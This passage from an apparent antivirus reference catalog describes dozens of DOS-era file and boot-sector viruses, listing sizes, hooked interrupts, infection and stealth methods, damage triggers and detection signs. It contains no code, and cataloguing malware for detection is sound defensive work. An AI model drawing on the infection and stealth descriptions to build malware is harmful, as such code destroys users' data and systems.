  908. in length by 4,744 bytes.
  909.  
  910. Damage: The virus formats the hard disk and destroys data stored on
  911. diskettes.
  912.  
  913. [No_of_Beast]
  914. Virus Name: No_of_Beast
  915. Alias Name: No. of the Beast,
  916. Number_of_the_Beast.E, DARTH, 666, 512
  917. Virus Type: File Virus
  918. Virus Length: 512 bytes
  919. Description: This virus infects *.COM files.
  920. PC Vectors Hooked: INT 13h, INT 21h
  921.  
  922. Infection method: When an infected file runs, the virus loads itself
  923. in the memory. While loaded, it infects accessed .COM files. The
  924. virus overwrites the first 512 bytes of the files it infects, but
  925. stores the original data in free space at the end of the file.
  926.  
  927. Damage: If an infected file is copied, some of its original data could
  928. be destroyed.
  929.  
  930. Note: If you attempt to examine an infected file while the virus is
  931. in memory, it will display the original, uninfected version.
  932.  
  933. [Nop]
  934. Virus Name: Nop
  935. Alias Name: Nops, Stealth_Boot
  936. Virus Type:
  937. Virus Length:
  938. Description: See Stealth_Boot.C
  939.  
  940. [Nov_17th]
  941. Virus Name: Nov_17th
  942. Alias Name: November 17th
  943. Virus Type: File virus
  944. Virus Length: 885 bytes
  945. Description: This virus infects *.COM and *.EXE files.
  946.  
  947. Execution Procedure:
  948. 1) The virus checks whether it is already loaded resident in memory.
  949.     If "No", it then loads itself resident into memory by hooking
  950.     INT 21h.
  951. 2) It then executes the original file.
  952. 3) With itself loaded resident in memory it will infect any uninfected
  953.     file that is executed.
  954.  
  955. Damage: On any day between November 17 and 30, the virus destroys the
  956. first 8 sectors of the current disk.
  957.  
  958. Note: Loads itself resident in memory. An error message appears if
  959. there is an I/O error (such as write protect).
  960.  
  961. [One_half]
  962. Virus Name: One_half
  963. Alias Name:
  964. Virus Type: File Virus
  965. Virus Length: 3,544 bytes
  966. Description: Infects *.COM and *.EXE files as well as COMMAND.COM.
  967. PC Vectors Hooked: INT 21h
  968.  
  969. Infection method: When an infected file runs, the virus loads itself
  970. in memory. While loaded, it infects any accessed executable files or
  971. boot sectors. The DOS CHKDSK program will show a "total bytes memory"
  972. decrease of 4,096 bytes. Infected .COM and .EXE files increase by
  973. 3,544 bytes.
  974.  
  975. Damage: Under analysis
  976.  
  977. Note: If you attempt to examine the hard drive while the virus is in
  978. memory, it will display the original, uninfected version.
  979.  
  980. [Ontario]
  981. Virus Name: Ontario
  982. Alias Name:
  983. Virus Type: File virus
  984. Virus Length: 512 bytes
  985. Description: Infects *.COM, *.EXE and overlay files, as well as
  986.                     COMMAND.COM.
  987.  
  988. When an infected file is executed, the virus installs itself into
  989. memory. Total available memory will decrease by 2,048 bytes.
  990. The virus will also infect COMMAND.COM increasing it's size by 512
  991. bytes.
  992.  
  993. Once the virus is memory resident, it will infect files when they
  994. are executed.  Infected files will increase in size by 512 - 1,023
  995. bytes depending on the type of file.
  996.  
  997. [Parity_boot.b]
  998. Virus Name: Parity_Boot.B
  999. Alias Name: Parity_BOOT.B, Generic1
  1000. Virus Type: Boot Virus
  1001. Virus Length: N/A
  1002. Description: This virus infects boot sectors.
  1003. PC Vectors Hooked: INT 13h
  1004.  
  1005. Infection method: When the system is booted from an infected diskette,
  1006. the virus infects the master boot record and loads itself in memory.
  1007. While loaded, it infects all accessed, non-protected disks. The DOS
  1008. CHKDSK program will show a "total bytes memory" decrease of 1,024 bytes.
  1009.  
  1010. Damage: The virus sets a one-hour delay timer when the system is turned
  1011. on. Each time a floppy is infected, the timer is reset. If no floppies
  1012. are infected, the virus simulates a parity error, displaying the
  1013. following message and hanging the system:
  1014.  
  1015.     Parity Check
  1016.  
  1017. Note: If you attempt to examine boot sectors while the virus is in
  1018. memory, it will display the original, uninfected version.
  1019.  
  1020. [Readiosys]
  1021. Virus Name: Readiosys
  1022. Alias Name: AntiCMOS, Lenart
  1023. Virus Type: Boot Virus
  1024. Virus Length: N/A
  1025. Description: This virus infects boot sectors.
  1026.  
  1027. When the system is booted from an infected hard disk, the virus loads
  1028. itself in memory.  After loading successfully, it infects most
  1029. accessed disks.  The DOS CHKDSK program will show a "total bytes
  1030. memory" decrease of 2,048 bytes.
  1031.  
  1032. This virus may change the CMOS settings, depending on the system
  1033. hardware. In many cases, the system will hang before the virus can
  1034. finish loading into memory.
  1035.  
  1036. [Ripper]
  1037. Virus Name: Ripper
  1038. Alias Name: Jack Ripper
  1039. Virus Type:   Boot Virus
  1040. Virus Length: N/A
  1041. Description: This virus infects boot sectors.
  1042.  
  1043. Infection method: The virus is loaded in memory when the system is
  1044. booted from an infected diskette. While loaded, the virus infects
  1045. any accessed, non-protected disks.
  1046.  
  1047. Damage: The virus corrupts the hard disk over time by randomly
  1048. selecting disk writes (approximately 1 per 1000) and swapping two
  1049. words in the write buffer.
  1050.  
  1051. Note: If you attempt to examine the infected boot sectors while the
  1052. virus is in memory, it will display the original, uninfected version.
  1053.  
  1054. [Slayer]
  1055. Virus Name: Slayer
  1056. Alias Name: 5120, Vbasic
  1057. Virus Type: File Virus
  1058. Virus Length: 5,120 bytes
  1059. Description: This virus infects *.COM and *.EXE files.
  1060.  
  1061. When an infected file is executed, the virus will infect all *.COM
  1062. and *.EXE files located in the same directory.  Infected files
  1063. will increase in size from 5,120 to 5,135 bytes with the virus
  1064. being located at the end of the file.  Date and time information
  1065. of infected files will not be altered.
  1066.  
  1067. [Squisher]
  1068. Virus Name: Squisher
  1069. Alias Name: Tiny Hunter
  1070. Virus Type: File Virus
  1071. Virus Length: 340 bytes
  1072. Description: Infects *.COM  files, as well as COMMAND.COM.
  1073.  
  1074. When an infected file is executed, the virus installs itself into
  1075. memory. Total available memory will not change.
  1076.  
  1077. Once the virus is memory resident, it will infect *.COM files that
  1078. contain more than 340 bytes of hex '00' characters when they are
  1079. executed.  Infected files will not experience an increase in size.
  1080. Date and time information of infected files will not be altered.
  1081.  
  1082. [Stealth_Boot.C]
  1083. Virus Name: Stealth_Boot.C
  1084. Alias Name: Amse, Nops, STELBOO, STB
  1085. Virus Type:  Boot Virus
  1086. Virus Length: N/A
  1087. Description: This virus infects boot sectors.
  1088. PC Vectors Hooked: INT 13h
  1089.  
  1090. Infection method: When the system is booted from an infected diskette,
  1091. the virus loads itself in memory and infects the master boot record.
  1092. While loaded, it infects any accessed, non-protected diskettes. The
  1093. DOS CHKDSK program will show a "total bytes memory" decrease of 4,000
  1094. bytes.
  1095.  
  1096. Damage: No intentional damage
  1097.  
  1098. Note: If you attempt to examine the infected hard disk sectors while
  1099. the virus is in memory, it will return a zero-filled buffer.
  1100.  
  1101. [Stoned]
  1102. Virus Name: Stoned
  1103. Alias Name: Marijuana, New Zealand, Stoned.Standard.A
  1104. Virus Type: Boot Virus
  1105. Virus Length: N/A
  1106. Description: This virus infects boot sectors.
  1107. PC Vectors Hooked: INT 13h
  1108.  
  1109. Infection method: When the system is booted from an infected floppy,
  1110. the virus loads itself in memory and infects the hard disk. While
  1111. loaded, it infects any accessed diskettes. The DOS CHKDSK program
  1112. will show a "total bytes memory" decrease of 2,048 bytes.
  1113.  
  1114. Damage: No intentional damage. Displays the text string:
  1115.  
  1116.     "Your PC is now Stoned!"
  1117.  
  1118. [Stoned.Azusa]
  1119. Virus Name: Stoned.Azusa
  1120. Alias Name: Azusa, Hong Kong
  1121. Virus Type: Boot Virus
  1122. Virus Length: N/A
  1123. Description: This virus infects boot sectors.
  1124. PC Vectors Hooked: INT 13h
  1125.  
  1126. Infection method: When a system is booted from an infected disk, the
  1127. virus loads itself in memory. While loaded, it attempts to infect
  1128. any accessed disks.  Unlike most boot sector viruses, it does not
  1129. preserve a copy of the original master boot record. Instead it
  1130. overwrites it and takes over its functions. The DOS CHKDSK program
  1131. will show a "total bytes memory" decrease of 1,024 bytes.
  1132.  
  1133. Damage: After a specified number of reboots, the virus temporarily
  1134. disables the serial and parallel ports.
  1135.  
  1136. [Sunday-1]
  1137. Virus Name: Sunday-1
  1138. Alias Name:
  1139. Virus Type: File Virus
  1140. Virus Length: 1,636 bytes
  1141. Description: Infects *.COM and *.EXE files as well as overlay files.
  1142.  
  1143. Damage: On Sunday, the virus may damage the FAT table.  It will also
  1144. display the following message:
  1145.  
  1146.     "Today is Sunday! Why do you work so hard?
  1147.     All work and no play makes you a dull boy!
  1148.     Come on!  Let's go out and have some fun!"
  1149.  
  1150. [Taiwan]
  1151. Virus Name: Taiwan
  1152. Alias Name: Taiwan 2
  1153. Virus Type: File Virus
  1154. Virus Length: 743 bytes
  1155. Description: Infects *.COM files, including COMMAND.COM.
  1156.  
  1157. When an infected file is executed, the virus will attempt to infect
  1158. three *.COM files starting from C:\. Infected files will increase
  1159. in size by 743 bytes with the virus being located at the beginning
  1160. of the file.
  1161.  
  1162. The virus is activated on the 8th of any month when it will overwrite
  1163. the FAT table and root directory.
  1164.  
  1165. [Telecom]
  1166. Virus Name: Telecom
  1167. Alias Name: Telefonica
  1168. Virus Type: File Virus
  1169. Virus Length: 3,700 bytes
  1170. Description: This virus infects *.COM files.
  1171.  
  1172. When an infected file is executed, the virus installs itself into
  1173. memory. Total available memory will decrease by 3,984 bytes.
  1174.  
  1175. Once the virus is memory resident, it will infect *.COM files that
  1176. are larger than 1,000 bytes when they are executed. Infected files
  1177. will increase in size by 3,700 bytes.  Date and time information
  1178. of infected files will be altered with 100 being added to the year.
  1179.  
  1180. [Tequila]
  1181. Virus Name: Tequila
  1182. Alias Name: Stealth
  1183. Virus Type: File Virus
  1184. Virus Length: 2,468 bytes
  1185. Description: Infects *.EXE files as well as boot sectors.
  1186. PC Vectors Hooked: INT 13h, INT 21h
  1187.  
  1188. Infection method: The first time an infected file runs, the virus
  1189. infects the master boot record. When the system is booted from the
  1190. infected hard disk, the virus loads itself in memory.  While loaded,
  1191. it infects any .EXE file that executes. The DOS CHKDSK program will
  1192. show a "total bytes memory" decrease of 3,072 bytes. Infected .EXE
  1193. files increase by 2,468 bytes.  The virus won't infect files starting
  1194. with "V" or "SC."
  1195.  
  1196. Damage: Several months after the initial infection, the virus becomes
  1197. active. Each month afterward, if an infected program is run on the
  1198. same day of the first infection, a graphic and this message will be
  1199. displayed.
  1200.  
  1201.     Welcome to T.TEQUILA'S latest production.
  1202.     Contact T.TEQUILA/P.o.Box 543/6312
  1203.     St'hausen/Switzerland
  1204.     Loving thoughts to L.I.N.D.A
  1205.     BEER and TEQUILA forever !
  1206.  
  1207. Note: The virus hides the infected partition record and increases
  1208. the size of infected files.
  1209.  
  1210. [Traveller]
  1211. Virus Name: Traveller
  1212. Alias Name: Bupt
  1213. Virus Type: File Virus
  1214. Virus Length: 1,220 to 1,237 bytes
  1215. Description: Infects *.COM and *.EXE files, as well as COMMAND.COM.
  1216.  
  1217. When an infected file is executed, the virus installs itself into
  1218. memory. Total available memory will decreased by 1,840 bytes.
  1219.  
  1220. Once the virus is memory resident, it will infect *.COM and *.EXE
  1221. files when they are executed. This virus will also infect when the
  1222. DIR command is used.  Infected files will increase in size by
  1223. 1,220 to 1,237 bytes, with the virus being located at the end of
  1224. the infected file. Date and time information of infected files
  1225. will not be altered.
  1226.  
  1227. The following text string can be found in the virus:
  1228.  
  1229.     "Traveller (C) BUPT  1991.4"
  1230.     "Don't panic I'm harmless <<---!!!!!!!"
  1231.     "*.* COMEXE"
  1232.  
  1233. [Trivial]
  1234. Virus Name: Trivial
  1235. Alias Name: Minimal, Mini-45
  1236. Virus Type: File Virus
  1237. Virus Length: 45 bytes
  1238. Description: Infects *.COM files, as well as COMMAND.COM.
  1239.  
  1240. When an infected file is executed, the virus will infect all *.COM
  1241. files in same directory.  The first 45 bytes of infected files will
  1242. be overwritten by the virus.  The date and time information of
  1243. infected files will be updated to the time of infection.
  1244.  
  1245. All infected files will be permanently corrupted.
  1246.  
  1247. [V-sign]
  1248. Virus Name: V-sign
  1249. Alias Name: Cansu, Sigalet, Sigalit
  1250. Virus Type:   Boot Virus
  1251. Virus Length: N/A
  1252. Description: This virus infects floppy boot sectors.
  1253. PC Vectors Hooked: INT 13h
  1254.  
  1255. Infection method: When an infected disk is booted, the virus loads
  1256. itself in memory. While loaded, it infects any accessed disk. The
  1257. DOS CHKDSK program will show a "total bytes memory" decrease of 2 KB.
  1258.  
  1259. Damage: After infecting 64 disks, the virus displays a large V and
  1260. hangs the machine.
  1261.  
  1262. [V2P6]
  1263. Virus Name: V2P6
  1264. Alias Name:
  1265. Virus Type: File Virus
  1266. Virus Length: 1,946 to 2,111 bytes
  1267. Description: This virus infects *.COM files.
  1268.  
  1269. When an infected file is executed, the virus will infect the first
  1270. uninfected *.COM file in the same directory. Infected files will
  1271. experience a file length increase of 1,946 to 2,111 bytes with the
  1272. virus being located at the end of the file.
  1273.  
  1274. [Vacsina]
  1275. Virus Name: Vacsina
  1276. Alias Name: Vacsina.TP-05.A, TP family
  1277. Virus Type: File Virus
  1278. Virus Length: 1,206 bytes
  1279. Description: This virus infects *.COM and *.EXE files.
  1280.  
  1281. Infection method: When an infected file runs, the virus loads itself
  1282. in memory. While loaded, it infects any file that executes. Before
  1283. infecting .EXE files, the virus converts them to a .COM file
  1284. format.
  1285.  
  1286. Damage: None known
  1287.  
  1288. Note: There are many known variants of the Vacsina virus. The Vacsina
  1289. family of viruses is also known as the "T.P." family.
  1290.  
  1291. [VCL]
  1292. Virus Name: VCL
  1293. Alias Name: Code Zero
  1294. Virus Type: File Virus
  1295. Virus Length: 576 bytes
  1296. Description: Infects *.COM  files, as well as COMMAND.COM.
  1297.  
  1298. When an infected file is executed, the virus will search the same
  1299. directory for an uninfected *.COM file. Infected files will experience
  1300. a file length increase of 576 bytes with the virus being located
  1301. at the end of the file.  If no uninfected files are found, the
  1302. following message is displayed:
  1303.  
  1304.     "** CODE ZERO **"
  1305.  
  1306. Date and time information of infected files will not be altered.
  1307.  
  1308. The following text string can be found in the virus:
  1309.  
  1310.     "*.* *.COM"
  1311.     "** CODE ZERO **"
  1312.     "Code Zero Virus"
  1313.     "1992 Nowhere Man/[NukE]"
  1314.  
  1315. [Vengence]
  1316. Virus Name: Vengence
  1317. Alias Name: Parasite, Vengeance
  1318. Virus Type: File Virus
  1319. Virus Length: 723 bytes
  1320. Description: Infects *.COM  files, as well as COMMAND.COM.
  1321.  
  1322. When an infected file is executed, the virus will infect the first
  1323. uninfected *.COM file in the same directory.  Infected files will
  1324. experience a file length increase of 723 bytes with the virus
  1325. being located at the end of the file.  Date and time
  1326. information of infected files will be altered to show 56 in the
  1327. seconds field.
  1328.  
  1329. The following text string can be found in the virus:
  1330.  
  1331.     "*** Vengeance is ours! ***"
  1332.     "SKISM/Phalcon '92"
  1333.     "PATH=*.COM"
  1334.     "????????COM"
  1335.  
  1336. [Vienna]
  1337. Virus Name: Vienna
  1338. Alias Name: DOS-62, Unesco, Austrian, 648, PC Boot
  1339. Virus Type: File Virus
  1340. Virus Length: 648 bytes
  1341. Description: This virus infects *.COM files.
  1342.  
  1343. Symptoms: Increases infected file sizes by 648 bytes and files
  1344. containing string "*.COM" and "PATH=". Destroyed programs will
  1345. cause computer to reboot while in operation.
  1346.  
  1347. Damage: With the probability of 1:7 the virus will not infect
  1348. other files. Virus writes the instruction JMP F000:FFF0 (computer
  1349. reboot) at the start of such a program. Original content is
  1350. destroyed, length of file is not changed, and destroyed program
  1351. contains virus flag.
  1352.  
  1353. [XPEH]
  1354. Virus Name: XPEH
  1355. Alias Name: 4-B, Yankee Doodle.XPEH.4928, Micropox
  1356. Virus Type: File Virus
  1357. Virus Length: 4,016 bytes
  1358. Description: This virus infects *.COM and *.EXE files.
  1359. PC Vectors Hooked: INT 1Ch, INT 21h
  1360.  
  1361. Infection method: When an infected file runs, the virus loads itself
  1362. in memory. While loaded, it infects any accessed executable files.
  1363. The DOS CHKDSK program will show a "total bytes memory" decrease of
  1364. 4032 bytes. Infected files increase by 4016 bytes.
  1365.  
  1366. Damage: Under analysis
  1367.  
  1368. [Yank-D.TP.44.A]
  1369. Virus Name: Yank-D.TP.44.A
  1370. Alias Name: Yankee Doodle, TP44
  1371. Virus Type: File Virus
  1372. Virus Length: 2,899 bytes
  1373. Description: This virus infects *.COM and *.EXE files.
  1374.  
  1375. When an infected file is executed, the virus installs itself into
  1376. memory. Once the virus is memory resident, it plays the song "Yankee
  1377. Doodle" on the computer speaker everyday at 5 p.m.
  1378.  
  1379. Infected files will experience a file length increase of 2,899 bytes.
  1380.  
  1381. [Simple]
  1382. Virus Name: Simple cd
  1383. Virus Type: File Virus (infects .COM files only.)
  1384. Virus Length:  No change
  1385. PC Vectors Hooked: None
  1386.  
  1387. Execution Procedure: Searches for .COM files in the current directory.
  1388. When it finds a .COM file it checks whether it has been  previously
  1389. infected by the SIMPLE virus. If "YES" it continues to look
  1390. for uninfected .COM files. It then infects the file and looks for the
  1391. next COM file until all the .COM files in the current directory are
  1392. infected.
  1393.  
  1394. Damage: Overwrites the original file, so the length of the original
  1395. file won't reflect any increase. Note: Doesn't stay resident in
  1396. memory. SIMPLE doesn't hook INT 24h when infecting files. Error
  1397. message appears if there is an I/O error present (such as write
  1398. protect).
  1399.  
  1400. [Alien-1]
  1401. Virus Name: Alien-1
  1402. Virus Type: File Virus (infects .COM and .EXE files.)
  1403. Virus Length: 571 Bytes (COM and EXE)
  1404. PC Vectors Hooked: INT 21h
  1405.  
  1406. Execution Procedure: Checks whether it has been loaded resident in
  1407. high memory. If "No", then it loads itself resident into memory
  1408. (highest memory) by hooking INT 21, then it executes the
  1409. originally called file; if "Yes", then it directly executes
  1410. the originally called file.
  1411.  
  1412. Damage:  None
  1413.  
  1414. Characteristics:
  1415. 1) The virus infects files by hooking INT 21h(AX=4B), when an
  1416.     uninfected file is executed, the file will be infected.
  1417. 2) Alien-1 doesn't hook INT 24h when infecting files. Error
  1418.     messages occur if there is an I/O error (such as write protect).
  1419.  
  1420. Detection Method: Infected files will increase by 571 bytes.
  1421.  
  1422. [Lep-0736]
  1423. Virus Name: Lep-0736
  1424. Virus Type: File Virus (infects .COM and .EXE files.)
  1425. Virus Length: No change
  1426. PC Vectors Hooked: None
  1427.  
  1428. Execution Procedure:
  1429. 1) Searches for .COM and .EXE files in current directory.
  1430. 2) Checks whether the files found have been infected by LEP-0736.
  1431.     If "Yes", continue to look for an uninfected COM and EXE files.
  1432. 3) Infects the uninfected file (infects only four files at a time).
  1433.     Then the following message appears on the screen: "Program too
  1434.     big to fit in memory"
  1435.  
  1436. Damage: Overwrites the original file, so the length of the file won't
  1437. increase.
  1438.  
  1439. Detection Method: Check for the error message: "Program too big to
  1440. fit in memory."
  1441.  
  1442. Note:
  1443. 1) Doesn't stay resident in memory.
  1444. 2) LEP-0736 doesn't hook INT 24h when infecting files. Error message
  1445.     appears if there is an I/O error (such as write protect).
  1446.  
  1447. [Ice-199]
  1448. Virus Name: Ice-199
  1449. Virus Type: File Virus (infects .COM files only.)
  1450. Virus Length: 199 Bytes
  1451. PC Vectors Hooked: None
  1452.  
  1453. Execution Procedure:
  1454. 1) Searches for a .COM file in the current directory.
  1455. 2) Checks whether it has been infected by Ice-199. If "Yes",
  1456.     continues to look for an uninfected .COM file.
  1457. 3) Infects only one file at a time.
  1458.  
  1459. Damage: None
  1460.  
  1461. Detection Method: Infected files will increase length by 199 bytes.
  1462.  
  1463. Note:
  1464. 1) Doesn't stay resident in memory.
  1465. 2) ICE-199 doesn't hook INT 24h when infecting files. Error message
  1466.     appears if there is an I/O error (such as write protect).
  1467.  
  1468. [Made-255]
  1469. Virus Name: Made-255
  1470. Virus Type: File Virus (infects .COM files.)
  1471. Virus Length: 255 Bytes
  1472. PC Vectors Hooked: None
  1473.  
  1474. Execution Procedure:
  1475. 1) Searches for a .COM file in the current directory.
  1476. 2) Checks whether it has been infected by Made-255. If "Yes",
  1477.     it continues to look for an uninfected .COM file.
  1478. 3) Infects only one file at a time.
  1479.  
  1480. Damage: None
  1481.  
  1482. Detection Method: Infected files will increase by 255 bytes.
  1483.  
  1484. Note:
  1485. 1) After an infected file is executed, the system  will halt.
  1486. 2) Doesn't stay resident in memory.
  1487. 3) MADE-255 doesn't hook INT 24h when infecting files. Error
  1488.     message appears if there is an I/O error (such as write protect).
  1489.  
  1490. [2570]
  1491. Virus Name: 2570
  1492. Virus Type: File Virus (infects .COM files only)
  1493. Virus Length: 2570 Bytes
  1494. PC Vectors Hooked: None
  1495.  
  1496. Execution Procedure: Searches for a .COM file in the current directory.
  1497. Checks first to verify if the file has been previously infected by 2570.
  1498. If "Yes", continues to look for an uninfected .COM file. Infects only
  1499. one .COM file at a time. After infection, information such as those
  1500. listed below will appear on the infected computer screen:
  1501.  
  1502. a) Cycle sluts from hell..
  1503. b) Virus Mania IV..
  1504. c) 2 Live Crew is fucking cool..
  1505. d) Like Commentator I, HIP-HOP sucks..
  1506. e) dr. Ruth is a first-class lady!..
  1507. f) Don t be a wimp, Be dead!.. and so on. Then the
  1508.    originally called program will be executed.
  1509.  
  1510. Damage: None
  1511.  
  1512. Detection Method: Infected files will increase by 2570 bytes.
  1513.  
  1514. Note: Doesn't stay resident in memory. 2570 doesn't hook INT 24h
  1515. when infecting files. Error message appears if there is an I/O error
  1516. (such as write protect).
  1517.  
  1518. [Ice-250]
  1519. Virus Name: Ice-250
  1520. Virus Type: File Virus (infects .COM files)
  1521. Virus Length: 250 Bytes
  1522. PC Vectors Hooked: None
  1523.  
  1524. Execution Procedure:
  1525. 1) Searches for a .COM file in the current directory.
  1526. 2) Checks whether it has been infected by Ice-250. If "Yes", it
  1527.     continues to look for an uninfected .COM file.
  1528. 3) It infects only one file at a time.
  1529.  
  1530. Damage: None
  1531.  
  1532. Detection Method: Infected files will increase by 250 bytes.
  1533.  
  1534. Note:
  1535. 1) Doesn't stay resident in memory.
  1536. 2) ICE-250 doesn't hook INT 24h when infecting files. Error
  1537.     message appears if there is an I/O error (such as write protect).
  1538.  
  1539. [Ice-224]
  1540. Virus Name: Ice-224
  1541. Virus Type: Virus Infector (infects .COM files)
  1542. Virus Length: 224 Bytes
  1543. PC Vectors Hooked: None
  1544.  
  1545. Execution Procedure:
  1546. 1) Searches for a .COM file in the current directory.
  1547. 2) Checks whether it has been infected by Ice-224. If "Yes",
  1548.     it continues to look for an uninfected .COM file.
  1549. 3) Infects only one file at a time.
  1550.  
  1551. Damage: None
  1552.  
  1553. Detection Method: Infected files will increase by 224 bytes.
  1554.  
  1555. Note:
  1556. 1) Doesn't stay resident in memory.
  1557. 2) ICE-224 doesn't hook INT 24h when infecting files. Error message
  1558.     appears if there is an I/O error (such as write protect).
  1559.  
  1560. [Lct-762]
  1561. Virus Name: Lct-762
  1562. Virus Type: File Virus (infects .COM files)
  1563. Virus Length: 762 Bytes
  1564. PC Vectors Hooked: None
  1565.  
  1566. Execution Procedure:
  1567. 1) Searches for a .COM file in the current directory.
  1568. 2) Checks whether it has been infected by LCT-762. If "Yes",
  1569.     continues to look for an uninfected .COM file.
  1570. 3) Infects  uninfected files until all .COM files in the directory
  1571.     have been infected.
  1572.  
  1573. Damage: None
  1574.  
  1575. Detection Method: Infected files will increase by 762 bytes.
  1576.  
  1577. Note:
  1578. 1) Doesn't stay resident in memory.
  1579. 2) LCT-762 doesn't hook INT 24h when infecting files. An error
  1580.     message appears if there is an I/O error (such as write protect).
  1581.  
  1582. [Alien-3]
  1583. Virus Name: Alien-3
  1584. Virus Type: File Virus (infects .COM and .EXE files)
  1585. Virus Length: 625 Bytes (COM and EXE)
  1586. PC Vectors Hooked: INT 21h
  1587.  
  1588. Execution Procedure:
  1589. 1) Checks whether it has been loaded resident in high memory.
  1590.     If "No", then it loads itself resident into memory (highest
  1591.     memory portion) by hooking INT 21h.
  1592. 2) The virus will then check the system time; if the number of
  1593.     minutes passed in the hour are between 33 to 60, it will display
  1594.     " " parentheses on the screen.
  1595. 3) After infection it will then execute the original file.
  1596.  
  1597. Damage:  None
  1598.  
  1599. Characteristics:
  1600. 1) The virus infects files by hooking INT 21h (AX=4B), when an
  1601.     uninfected file is executed, the file will be infected.
  1602. 2) Alien-3 doesn't hook INT 24h when infecting files. Error message
  1603.     appears if there is an I/O error (such as write protect).
  1604.  
  1605. Detection Method: Infected files will increase by 625 Bytes.
  1606.  
  1607. [Lep-562]
  1608. Virus Name: Lep-562
  1609. Virus Type: File Virus (infects .COM and .EXE files)
  1610. Virus Length: No change
  1611. PC Vectors Hooked: None
  1612.  
  1613. Execution Procedure:
  1614. 1) It first searches for a .COM or .EXE file in the current directory.
  1615. 2) It checks whether it has been infected by LEP-562. If "Yes", it
  1616.     continues to look for uninfected .COM and .EXE files.
  1617. 3) If "No" it will infect the uninfected files (infecting only four
  1618.     files at a time). When you execute the file the following message
  1619.     appears on the screen:
  1620.  
  1621.       "Program too big to fit in memory."
  1622.  
  1623. Damage: Overwrites the original file, so the length of the file won't
  1624. increase.
  1625.  
  1626. Detection Method: Check for the message: "Program too big to fit in
  1627. memory" on the screen.
  1628.  
  1629. Note:
  1630. 1) Doesn't stay resident in memory.
  1631. 2) LEP-562 doesn't hook INT 24h when infecting files. Error message
  1632.     appears if there is an I/O error (such as write protect).
  1633.  
  1634. [Navi-282]
  1635. Virus Name: Navi-282
  1636. Virus Type: File Virus (infects .COM files only)
  1637. Virus Length: 282 Bytes
  1638. PC Vectors Hooked: None
  1639.  
  1640. Execution Procedure:
  1641. 1) Searches for a .COM file in the current directory.
  1642. 2) Checks whether it has been infected by NAVI-282. If "Yes", it
  1643.     continues to look for any uninfected .COM files.
  1644. 3) Infects only one file at a time.
  1645.  
  1646. Damage: None
  1647.  
  1648. Detection Method: Infected files will increase by 282 bytes.
  1649.  
  1650. Note:
  1651. 1) Doesn't stay resident in memory.
  1652. 2) NAVI-282 doesn't hook INT 24h when infecting files. Error message
  1653.     appears if there is an I/O error (such as write protect).
  1654.  
  1655. [Minimite]
  1656. Virus Name: Minimite
  1657. Virus Type: File Virus (infects .COM files)
  1658. Virus Length: 183 Bytes
  1659. PC Vectors Hooked: None
  1660.  
  1661. Execution Procedure:
  1662. 1) Searches for a .COM file in the current directory.
  1663. 2) Checks whether it has been infected by Minimite. If "Yes", it
  1664.     continues to look for any uninfected .COM files.
  1665. 3) It then continues to infect files until all .COM files in the
  1666.     directory have been infected.
  1667.  
  1668. Damage: None
  1669.  
  1670. Detection Method: Infected files will increase by 183 Bytes.
  1671.  
  1672. Note:
  1673. 1) Doesn't stay resident in memory.
  1674. 2) Minimite doesn't hook INT 24h when infecting files. Error message
  1675.     appears if there is an I/O error (such as write protect).
  1676.  
  1677. [Spanz]
  1678. Virus Name: Spanz
  1679. Virus Type: File Virus (infects .COM files)
  1680. Virus Length: 639 Bytes
  1681. PC Vectors Hooked: None
  1682.  
  1683. Execution Procedure:
  1684. 1) Searches for a .COM file in the current directory.
  1685. 2) It then checks the date of the .COM file.
  1686. 3) Checks whether it has been infected by Spanz. If "Yes", continues
  1687.     to look for any uninfected .COM files.
  1688. 3) Infects only one file at a time.
  1689.  
  1690. Damage: None
  1691.  
  1692. Detection Method: Infected files will increase by 639 Bytes.
  1693.  
  1694. Note:
  1695. 1) Doesn't stay resident in memory.
  1696. 2) Spanz doesn't hook INT 24h when infecting files.  Error message
  1697.     appears if there is an I/O error (such as write protect).
  1698.  
  1699. [Wilbur]
  1700. Virus Name: Wilbur
  1701. Virus Type: File Virus (infects .COM files)
  1702. Virus Length: 512 Bytes
  1703. PC Vectors Hooked: None
  1704.  
  1705. Execution Procedure:
  1706. 1) Searches for a .COM file in the current directory.
  1707. 2) It then checks whether it has been infected by Wilbur. If "Yes",
  1708.     it continues to look for any uninfected .COM files.
  1709. 3) It infects only one file at a time.
  1710. 4) After infection it executes the originally called file.
  1711.  
  1712. Damage:  None
  1713.  
  1714. Detection Method: Infected files will increase by 512 Bytes.
  1715.  
  1716. Note:
  1717. 1) Doesn't stay resident in memory.
  1718. 2) Wilbur doesn't hook INT 24h when infecting files. Error message
  1719.     appears if there is an I/O error (such as  write protect).
  1720.  
  1721. [Repent]
  1722. Virus Name: Repent
  1723. Virus Type: File Virus (infects .COM files)
  1724. Virus Length: No change
  1725. PC Vectors Hooked: None
  1726.  
  1727. Execution Procedure:
  1728. 1) Searches for a .COM file in the current directory.
  1729. 2) It then checks whether it has been infected by Repent. If "Yes",
  1730.     it continues to look for any uninfected .COM files.
  1731. 3) It infects only three files at a time.
  1732.  
  1733. Damage: Overwrites original file, so the length of infected file
  1734. won't increase.
  1735.  
  1736. Note:
  1737. 1) Doesn't stay resident in memory.
  1738. 2) Repent doesn't hook INT 24h when infecting files. Error message
  1739.     appears if there is an I/O error (such as write protect).
  1740.  
  1741. [Twin-Peak]
  1742. Virus Name: Twin-Peak
  1743. Virus Type: File Virus (infects .COM files)
  1744. Virus Length: No change
  1745. PC Vectors Hooked: None
  1746.  
  1747. Execution Procedure:
  1748. 1) Searches for a .COM file in the  current directory.
  1749. 2) Checks to see whether it has been infected by TWIN-PEAK. If "Yes",
  1750.     it continues to look for any uninfected .COM file.
  1751. 3) It only infects one file at a time.
  1752.  
  1753. Damage: Overwrites original file, so the length of infected file
  1754. won't increase.
  1755.  
  1756. Note:
  1757. 1) Doesn't stay resident in memory.
  1758. 2) TWIN-PEAK doesn't hook INT 24h when infecting files. Error
  1759.     message appears if there is an I/O error (such as write protect).
  1760.  
  1761. [Pa-5792]
  1762. Virus Name: Pa-5792
  1763. Virus Type: File Virus (infects .EXE files)
  1764. Virus Length: 5792 Bytes
  1765. PC Vectors Hooked: None
  1766.  
  1767. Execution Procedure:
  1768. 1) Searches for an .EXE file in the current directory and the "A:"
  1769.     drive.
  1770. 2) It then checks whether it has been infected by PA-5792. If "Yes",
  1771.     it continues to look for any uninfected .EXE file.
  1772. 3) It only infects seven files at a time.
  1773. 4) It executes the originally called file.
  1774.  
  1775. Damage:  None
  1776.  
  1777. Detection Method: Infected files will increase by 5792 Bytes.
  1778.  
  1779. Note:
